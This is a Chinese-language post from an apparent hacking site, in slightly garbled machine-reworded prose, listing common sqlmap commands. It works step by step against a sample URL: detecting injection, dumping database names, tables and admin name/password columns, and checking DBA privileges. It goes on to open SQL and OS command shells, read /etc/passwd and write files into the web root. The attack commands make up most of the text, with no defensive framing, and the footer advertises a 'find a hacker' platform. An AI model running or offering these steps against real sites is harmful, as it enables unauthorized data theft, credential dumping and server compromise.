最常见的Sqlmap用法

hacker5年前 (2020-06-02)黑客文章722

Sqlmap是一个技术专业的SQL引入专用工具，使用 *** 也许多，实际可以用"sqlmap -hh"查询详细的指令帮助文件，我这仅仅给大伙儿共享一些最常见的Sqlmap用法：

一、Sqlmap引入篇

1、查验引入点

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11

2、爆全部数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --dbs

爆当今数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --current-db

3、列举特定数据库查询全部的表名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D fujieace --tables

'fujieace' 为特定数据库查询名字

4、列举特定表名的全部字段名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D vhost48330 -T admin --columns

'admin' 为特定表名字

5、dump输出打印表名特定列姓名段的值数据信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D vhost48330 -T admin -C name,password --dump

'name，password' 为特定字段称

二、Sqlmap用户权限篇

1、列举数据库查询智能管理系统客户：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --users

查询当今数据库连接客户：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --current-user

2、分辨当今客户是不是DBA？

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --is-dba

3、查询用户权限：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --privileges

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --privileges -U fujieace

三、Sqlmap文件实际操作与shell提权篇

1、sql shell

这儿根据sqlmap能够立即获得一个sql shell，立即实行sql语句开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --sql-shell
sql-shell> select version();

留意：这儿因为进入了sql shell能够实行sql语句了，还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入；

2、cmd shell

这里根据sqlmap能够立即获得一个cmd shell，立即实行cmd指令开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --os-shell

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --os-cmd=ipconfig

3、载入 *** 服务器上特定文档

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-read=/etc/passwd

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-read=d:/test.txt

4、载入本地文件到 *** 服务器上

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-write /test/test.txt --file-dest /var/www/html/1.txt

标签: 黑客技术

返回列表

上一篇：JohnRipper是“最后的”登陆密码黑客工具!专用工

下一篇：我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

Splunk是不是适用全部电脑操作系统?

什么叫Splunk？ Splunk捕捉，数据库索引，随后关系可检索的储存库文件的数据信息，从这当中能够转化成汇报，图型，报警，数据可视化和汽车仪表板。被觉得是最好是的安全工器具之一，这个东西的纯碎...

详解ASP PHP脚本渗透入侵过程

简单判定有无漏洞：粗略型：’ 1. 数字型： and 1=1 and 1=2 2.字符型： ‘ and ’1′=’1 ‘ and ’1′=’2 3.搜索型：...

扔掉工具，让你飞速学会手工注入

前言：现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷！正是因为注入攻击的流行，使的市面上的注入工具层...

妻子出走丈夫找“黑客”定位

昨天13：42，新浪网友@翠苑派出所发微博：新晋奶爸报案，为了帮嗷嗷待哺的孩子找妈妈，他想尽办法，最后竟求助于网上的陌生人。陌生人称可以通过全球定位的网站找到妈妈，需要的只是妈妈的手机号和800...

DumpSec是完全免费的吗?

什么叫DumpSec？ Dumpsec是为Microst Windows建立的安全性程序流程。它能够转储系统文件，复印机，注册表文件的DACL和SACL，并以详尽和可写的文件格式共享资源它。它还能...

什么是电脑肉鸡_电脑肉鸡是什么意思

所谓电脑肉鸡，就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix等；更可以是一家公司\企业\学校甚至是政府军队的服务器，一般所说的肉鸡是一台...

找黑客平台